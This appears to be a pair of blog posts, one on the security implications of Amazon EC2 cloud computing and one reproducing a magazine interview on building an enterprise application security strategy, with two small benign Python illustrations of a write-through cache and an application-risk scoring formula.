1. Prior to terminating an instance, backup the data to persistent storage, either over the Internet, or to Amazon S3.
2. Run a redundant set of systems with replication of the data between them.
We recommend you should not rely on a single instance to provide reliability for your data.
This means that existing applications and systems need to be re-engineered to persist data in the cloud (outside of the virtual environment). Makes sense: in order to take advantage of the elasticity of cloud computing, your data has got to be 'in the cloud' and not tied to a single virtual instance. This may have some legal implications, and it may make some organizations (initially) uncomfortable to come to terms with the idea that their live data does not persist on their own hardware.
I'm afraid we are likely to see cases of security issues arising from badly re-engineered application code as developers attempt to code their applications to persist data using services like S3 instead of local data stores.
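One pattern that avoids the worst of the ad-hoc re-engineering is to treat the instance's local disk purely as a cache, with a durable store as the sole source of truth. A minimal illustrative sketch follows - the DurableStore class merely stands in for a service like S3, and none of this is Amazon's actual API:

```python
# Illustrative write-through pattern: every update goes to durable storage
# first, so losing the instance loses no data. DurableStore is a stand-in
# for an external service such as S3 (not a real API).
class DurableStore:
    def __init__(self):
        self._blobs = {}

    def put(self, key, data):
        self._blobs[key] = data

    def get(self, key):
        return self._blobs.get(key)

class InstanceLocalCache:
    """Local disk is treated as a cache; the store is the source of truth."""
    def __init__(self, store):
        self.store = store
        self.local = {}          # lost when the instance terminates

    def write(self, key, data):
        self.store.put(key, data)   # persist first...
        self.local[key] = data      # ...then cache locally

    def read(self, key):
        if key in self.local:
            return self.local[key]
        return self.store.get(key)  # cache miss: fall back to durable copy

store = DurableStore()
node = InstanceLocalCache(store)
node.write("orders/1", b"widget x2")
node.local.clear()                  # simulate the instance terminating
print(node.read("orders/1"))        # data survives: b'widget x2'
```

The security-relevant point is that the write path is a single, reviewable choke point - far easier to get right than scattering S3 calls through application code after the fact.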
Risk Based on Data. Most often, organizations fail to build a risk inventory of their assets based on the type of data each system reads and writes. The cloud computing paradigm will force organizations to think of data foremost when building a risk inventory. This is a good thing.
Security Principles. Obvious and well known security principles apply to cloud based services like EC2. You've got to ensure that your VMs are configured securely, that your applications are developed securely, and that you communicate securely - think about authentication, authorization, access control, cryptography, and monitoring on all layers and tiers of the system.
The Threat of Mono-culture. I'm reminded of Dan Geer's words on the threat of mono-culture. If you start up hundreds of instances of a virtual image, a vulnerability in one instance will apply to all other instances of the same image. Imagine a situation where a remotely exploitable vulnerability is found in the generic kick start image Amazon recommends to its customers - suddenly, the security of a considerable amount of resources and data within the cloud will be at stake.
Cloud Insecurity. Security issues within the Amazon web services will have an extremely high impact on EC2 customers. For example, suppose a malicious user is able to invoke the services behind ec2-terminate-instances to terminate instances outside of his or her role. Such a vulnerability could be abused to black-out the Amazon cloud.
Perimeter? What Perimeter? The concept of relying on a network based perimeter has been losing steady ground. Cloud computing services like EC2 will be a catalyst to this trend - data and resources will be distributed in a shared cloud space, and the concept of a network based perimeter will no longer apply. Instead, security controls will need to be assured on all layers and tiers of the architecture. However, there are bound to be cases where organizations will try to build trust within the cloud to construct a virtual perimeter that imitates legacy designs.
Service Provider Liability. As the concept of cloud computing gains ground, it is likely that service providers will seek to implement technical solutions that allow them to provide resources in the cloud without the legal liability of hosting and computing secret or illegal data. For example, a consumer or legal requirement may demand that cloud customers be able to compute or store data in the cloud without exposing the computation results or the data to the provider. This may help tangible products arise from academic concepts such as zero knowledge based solutions.
Single Point of Failure. Amazon provides the concept of Zones and Regions (currently limited to 1 region):
Amazon EC2 now provides the ability to place instances in multiple locations. Amazon EC2 locations are composed of regions and availability zones. Regions are geographically dispersed and will be in separate geographic areas or countries. Currently, Amazon EC2 exposes only a single region. Availability zones are distinct locations that are engineered to be insulated from failures in other availability zones and provide inexpensive, low latency network connectivity to other availability zones in the same region. Regions consist of one or more availability zones. By launching instances in separate availability zones, you can protect your applications from failure of a single location.
This is good - Amazon allows for instances to be booted in different zones to prevent impact from the failure of a particular location. But what about Amazon as a whole as the single point of failure? The concept of resources being distributed geographically makes this scenario less probable. As cloud offerings from other companies emerge, it may make sense for larger organizations to host on other cloud service offerings to further decrease the single point of failure scenario. Doing so could be a little difficult since competing services may require adherence to specific programming languages and environments. For example, the Google App Engine SDK is currently limited to Python and is not based on the concept of allowing users to configure full blown virtual environments. Perhaps I'll write my thoughts on the Google App Engine in the near future.
I'm excited about the concept of cloud based computing. It's the future, and Amazon has done a good job of turning the hype into reality. I'll be interested to see how Google's offerings mature, and what Microsoft and IBM have up their sleeves.
These are just my initial thoughts on security implications of the emerging cloud computing paradigm. I'll continue to post updates as I have time to think about it some more. If you'd like to share some ideas, I'd be interested to hear them.
Issue 16 of [IN]Secure Magazine is available. Mirko Zorz interviewed me in this edition (Page 41). If you decide to read it, I'd be delighted to hear your thoughts and feedback. The magazine edition of the interview is much better looking and highly recommended (as are the other articles), but for the sake of convenience, the interview session is below.
Enterprises need to formulate high-level goals for application security efforts before implementing specific service lines. What are the key areas they have to cover in order to make their endeavor successful?
I agree. You've got to strategize high-level goals before deciding on specifics. Most businesses are not in the business of being secure. They are in the business of generating revenue, protecting their brand, and their intellectual property. Application security goals must derive from and support these business goals to promise risk reduction across the enterprise cheaply and effectively. Such promises in turn require specific implementations and processes such as hiring the right talent, laying the right framework, hooking security into the development lifecycles, training, metrics, and executive support.
Despite owning a plethora of software and hardware solutions, the critical asset to an organization is still the security professional who works with those acquisitions. Just how important is the security team?
Talent is key. What good is an application scanner or code analyzer if you don't have professionals in your team who actually understand the results? The fastest way to lose credibility with the business is to employ individuals who cannot go beyond running assessment tools and exporting reports. The job of a security team in any organization is not to hire people who can point and click their way into running assessment tools, but to establish a world-class effort that serves the needs of the business. You do that by hiring subject matter experts. You do that by hiring talent that can impress the business and demonstrate tangible value and progress.
With the threat landscape constantly evolving and old issues still not resolved, the organization has to battle problems such as a lack of security awareness that bring in a myriad of complications. What is the right approach to take in order to battle difficulties one can't completely protect against?
That's a two-part question: how to deal with known issues, and how to keep up with the latest attack vectors. First, you've got to establish a process that aims to remove security gaps at the root. Training and awareness offer the best ROI in this regard: bugs that don't get created in the first place - imagine that! It is also vital to embed security into the development lifecycles of applications. However, many organizations have trouble deciding where to begin. The solution is to assign effort based on risk. Start by understanding what applications you own and what their business impact is. What type of data do these applications read and write? What is the business criticality of these applications? Once you have a good understanding of your application portfolio, it will be much easier to assign effort so you can focus clearly.
As for the second part of the question, the solution is to invest effort into research and development so you continue to understand how the latest attack vectors may target your software. Yet again, training and awareness wins in this regard. Set aside a budget to send your team to information security conferences and training programs so they can soak up new knowledge. Allow analysts to take some time out to investigate the latest attack techniques. Most hands on security professionals are scientists at heart - understand what makes them thrive and support their talent. Support their desire to learn new ways to break security controls. Finally, capture and communicate this knowledge to the business. For example, ensure your threat modeling attack libraries are up to date and reflect the latest attack vectors, that your code review and assessment methodologies are bleeding edge, and that you take time out to brief the architects and developers on what they need to know to keep up.
Although applications have the largest attack vector today, CSOs don't take this into account when strategizing security spending. What kind of issues can this bring in the near future?
I overwhelmingly agree - the security spend of many organizations is out of whack with the real threat landscape. I feel there are multiple reasons behind this situation. The most common, in my personal opinion, is that many individuals who have been hands on in the past remember and hold on to the notion of the network layer being the only big thing to worry about. I can sympathize with that view - if you rewind a couple of years, the majority of high impact attacks could be identified and blocked via network controls, because the attack surface of applications was low compared to today, when a typical enterprise level web application is comprised of millions of lines of custom code. Another reason may be that application security solutions do not provide the instant gratification of throwing in a few appliances to solve problems. Well, perhaps I should take that back - there are a few web application firewall appliances starting to be marketed that way, but that's the nature of marketing and I'll save my rant for another forum. Also, quite unfortunately, there will be more situations in the coming years where security efforts align with reality only after learning the hard way - i.e. after an application related exposure has already taken place. That said, the onus is still on security professionals and researchers - we need to do an even better job of demonstrating impact and educating decision makers on why a solid application security strategy is vital to any organization's overall security effort.
While having consultants come in and perform black box penetration audits of applications every year is more costly than investing in a solid SDLC process, many organizations still believe it to be the proper strategy. What should they take into consideration when making this decision?
Black-box penetration tests are useful, yet they are extremely expensive and ineffective when relied upon as an exclusive solution. Paraphrasing a colleague of mine, "Companies that rely solely on black-box assessments to guide their security efforts are essentially having consultants come in, throw a grenade at them, and close the door on their way out". Gary McGraw likens this situation to what he calls a "Badnessometer": black-box assessment results are symptoms that reflect the level of trouble you may be in. The response shouldn't be to just fix the black-box findings, but to respond to the situation strategically, and ensure you are eliminating the root cause of your problems so they do not re-occur.
The solution is to "push left". The phases of a typical application development cycle, from left to right, are requirements, design, implementation, test, and production. The more effort you put into implementing the right security controls at an earlier tollgate, the less it will cost you. For example, assume that a review of security controls during the design phase results in an architect having to re-engineer the authentication mechanism. Now imagine that this issue was not caught during the design phase, but uncovered during an attack & penetration assessment after the application is in production. It is not trivial to re-engineer a product that is already in production. And it is extremely costly - multiple times costlier.
Black-box assessments, coupled with the right strategy, do have their place. Going back to Gary McGraw's point, they help uncover symptoms. These assessments can be used to further augment and enhance an existing security SDLC process. For example, if you are finding too many issues via black-box assessments during pre-production that you failed to uncover during design and test, then it is time to re-evaluate your SDLC process and approach.
Besides having an excellent technical background, the CSO has to be good at demonstrating a tangible impact of his actions to the management in order to justify security spending. This ability is becoming increasingly important and can take the focus off the main areas of security he should be working on. How can the CSO lighten this load?
Justifying security spend for application security is not difficult. In addition, application security efforts can have positive political side effects for the CSO and the security team. I'll tackle these two points separately. First, application security must tie into the overall IT risk strategy. Start with asking what the company's business goals are, and how you want to demonstrate value. Map these goals to efforts based on risk that will flow into specific tactics that can demonstrate ROI. For example, if your organization currently relies on yearly black-box assessments, calculate the cost of performing the assessments in addition to the cost of remediation. Compare the cost with progress you've made by evaluating the last two assessment results for the same application. Most likely, you will find that you have made little tangible progress in the form of risk reduction and that the remediation cost has been high. Now calculate the cost of investing in a "push left" scenario. Put these two scenarios side by side, and you'll have a solid case for ROI. The returns for a good application strategy are tremendous. The important thing is to continue to measure returns by formulating a good metrics program. Keep track of how security is helping business and technology improve, measure the drop of defects per lines of code, measure the amount of risk reduction. Show value. Demonstrate how your program is embedding security into the organization's DNA.
To my second point, a well thought out application security strategy can help the CSO politically. If you hire the right talent, and approach business and technology with the right attitude, i.e. to enable and not disable, you'll make a lot of new friends. Security departments often complain that the revenue generating business units view them with disapproval, yet the quest for application security is a fantastic opportunity for the security team to work closely with business. Do it right, and the business will love you for it. You will win their credibility and gratitude.
How important is threat modeling?
If you want to do application security right, you've got to invest in threat modeling. The goal of a threat model is to enumerate the malicious entity's goals even if the threats being enumerated have been mitigated. This helps the business, developers, architects, and security analysts understand the real world threats to their applications. Threat modeling should be initiated during the design phase of the application and it should be treated as a living document. As the application development process progresses, the threat model can be further enhanced so it is increasingly valuable. For example, a threat model created during the design phase can be further augmented to map to actual code review results to help developers and architects understand areas they need to improve on and areas where they are doing a good job. Threat modeling is a core component of the push-left strategy, so you eliminate defects as early as possible.
What recommendations would you give to a new organization that is just starting to build an application security strategy?
Once you've derived your strategy from your overall business and security goals, it's time to list specifics.
1. Talent and Framework. Hire the right talent and lay the framework: policies, requirements, best practices, and methodologies.
2. Kick start efforts on critical applications. Kick start your efforts on your critical applications: work with business and technology to help them understand the risks to their applications and what they can do to eliminate them as early as possible. Help them invest early by offering advice on architecture level security controls and threat modeling. Give the development teams guidance on secure coding policies. Assess the code for security defects, followed by a penetration test before the application is turned over to production. Ensure proper application logging mechanisms are built in and monitored.
3. Application portfolio. Come up with a formula to calculate business impact of an application based on key questions. Rank the applications by impact, and assign effort. At this point, you may want to take regulatory requirements into account, most often based on the type of data handled.
4. Invest in training and awareness. The security team, business, and technology must have access to continuous security training. Calculate metrics from code review results to target security training to certain business units. After a code review assessment, get a few of the developers into a room and show them the impact of the vulnerabilities found. Work together to enhance the threat model and possibly fix the defects. The goal is training, awareness, and knowledge transfer.
5. Metrics. Demonstrate value - for example, a graph showing defects per line of code decreasing over the span of the last few months. Demonstrate risk reduction per business unit, which often leads to some healthy competition, and that's a good thing. Overall, you've got to show application risk reduction across the enterprise.
6. Stay cutting edge. Retain talent. Treat your team well. Understand the latest attack vectors. Invest in research. Communicate and support the business - they are your clients and they need your help.
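To make the application portfolio idea in point 3 concrete, here is a hypothetical sketch of a business impact formula. The factors, weights, and applications below are all invented for illustration - every organization will pick its own key questions and weightings:

```python
# Hypothetical portfolio-ranking sketch: score each application on a few
# risk factors (rated 1-10) and combine them with made-up weights.
WEIGHTS = {"data_sensitivity": 0.5, "revenue_impact": 0.3, "user_reach": 0.2}

def impact_score(app):
    # Weighted sum of the factor ratings for one application
    return sum(WEIGHTS[factor] * app[factor] for factor in WEIGHTS)

portfolio = [
    {"name": "payments", "data_sensitivity": 10, "revenue_impact": 9, "user_reach": 7},
    {"name": "intranet wiki", "data_sensitivity": 3, "revenue_impact": 2, "user_reach": 4},
]

# Rank applications by impact so security effort flows to the top of the list
for app in sorted(portfolio, key=impact_score, reverse=True):
    print(app["name"], round(impact_score(app), 1))
```

Crude as it is, even a formula like this forces the conversation onto the data each application handles, which is exactly where regulatory requirements tend to attach.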